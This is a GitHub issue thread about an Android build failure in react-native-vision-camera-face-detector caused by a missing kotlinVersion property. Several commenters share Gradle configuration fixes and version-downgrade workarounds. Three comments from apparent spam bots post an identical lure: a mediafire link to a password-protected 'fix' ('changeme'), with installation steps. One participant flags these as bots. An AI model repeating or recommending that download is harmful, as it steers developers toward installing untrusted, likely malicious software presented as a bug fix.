### ISSUE TITLE
[BUG 🐛] Could not get unknown property 'kotlinVersion' 

### ISSUE THREAD

**Issue by longb1997** [luicfrr/react-native-vision-camera-face-detector#90]
Hello, i just installed this lib and run yarn android, but it's can't build. Only happen on Android

```
error Failed to install the app. Make sure you have the Android development environment set up: https://reactnative.dev/docs/environment-setup.
Error: Command failed: ./gradlew app:installDebug -PreactNativeDevServerPort=8081

FAILURE: Build failed with an exception.

* Where:
Build file '/Users/mobile/dev/mini-app-checkin/node_modules/react-native-vision-camera-face-detector/android/build.gradle' line: 17

* What went wrong:
A problem occurred evaluating project ':react-native-vision-camera-face-detector'.
> Could not get unknown property 'kotlinVersion' for object of type org.gradle.api.internal.artifacts.dsl.dependencies.DefaultDependencyHandler.
```

**Device:**
 - OS: Android

**`package.json` file:**

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by longb1997** [comment]
holy sh*t, @luicfrr your repo was invaded by bots

**Comment by luicfrr** [comment]
Can you please check if [this](https://github.com/luicfrr/react-native-vision-camera-face-detector/issues/71#issuecomment-2186614831) fix this issue?

**Comment by michelorth** [comment]
same problem, I try https://github.com/luicfrr/react-native-vision-camera-face-detector/issues/71#issuecomment-2186614831 but not work

**Comment by ibrahim-developes** [comment]
Tried on a clean new project this did not came up

**Comment by c-goettert** [comment]
I am facing the same issue. The issue is gone after I set a Kotlin-Version in my `android/build.gradle`, e.g.:

```
buildscript {
    ext {
        buildToolsVersion = "34.0.0"
        minSdkVersion = 26
        compileSdkVersion = 34
        targetSdkVersion = 34

        kotlinVersion = "2.0.0"
        // We use NDK 23 which has both M1 support and is the side-by-side NDK version from AGP.
        ndkVersion = "23.1.7779620"
    }
    ...
```

However, after I added a Kotin-Version, I am facing issue #71 (exactly the same error). The suggested solution (cleaning gradle cache) does not fix it for me. I tested a lot of kotlinVersions (1.6,1.7,1.9,2.0,...) but none of them did work.. I am working on a bare non-expo RN Project (RN-Version 0.71.19).

**Comment by ibrahim-developes** [comment]
![image](https://github.com/user-attachments/assets/14dcf7c2-1696-4777-ab3e-6736ee6311ae)
Kotlin veriosn in node_modules/react-native-vision-camera-face-detector/android/build.gradle' line: 17
should be same as in your project's build.gradle

below is  an example

build.gradle of project 

    ext {
        buildToolsVersion = "34.0.0"
        minSdkVersion = 26
        compileSdkVersion = 34
        targetSdkVersion = 34
        ndkVersion = "25.1.8937393"
        kotlin_version = "1.8.0"
    }
    
    node_modules/react-native-vision-camera-face-detector/android/build.gradle' line: 17
    
    def kotlin_version = safeExtGet("VisionCameraFaceDetector_kotlinVersion", "1.8.0")
    
    this should resolve the issue

**Comment by c-goettert** [comment]
Thanks for your answer. The kotlinVersion in the file you mentioned was "2.0.0", which I also tried but I still faced the error. I think for me it was also related to the android `compileSdkVersion`(34). With the help of [this comment](https://github.com/mrousavy/react-native-vision-camera/issues/3138#issuecomment-2338225204) I found out that I also needed to downgrade vision-camera to version to 4.3.1 for my RN-version (0.71.19). Now it compiles successfully 🎉

**Comment by luicfrr** [comment]
I think this issue is solved, right?
I'm closing it now but if the problem still happens maybe we can reopen it.
I'll also add it to `Troubleshooting` item on readme.

**Comment by abdulholiq-ahmad** [comment]
Hello everyone, I have a problem, in the process of using useFrameProcessor, I got stuck with an error.

`Error: Exception in HostFunction: system/frame-processors-unavailable: Frame Processors are disabled!`

**Comment by AnthonyJamez12** [comment]
Add this to your android/build.gradlew, that worked for me at least.

allprojects {
    repositories {
  ...
    }
//Add the this to your code
    subprojects { subproject ->
        // Apply Kotlin version override specifically for the Vision Camera Face Detector package
        if (subproject.name.contains("react-native-vision-camera-face-detector")) {
            subproject.ext.kotlinVersion = "2.0.0"
            subproject.afterEvaluate {
                subproject.buildscript.dependencies {
                    classpath "org.jetbrains.kotlin:kotlin-gradle-plugin:${subproject.ext.kotlinVersion}"
                }
            }
        }
    }
}
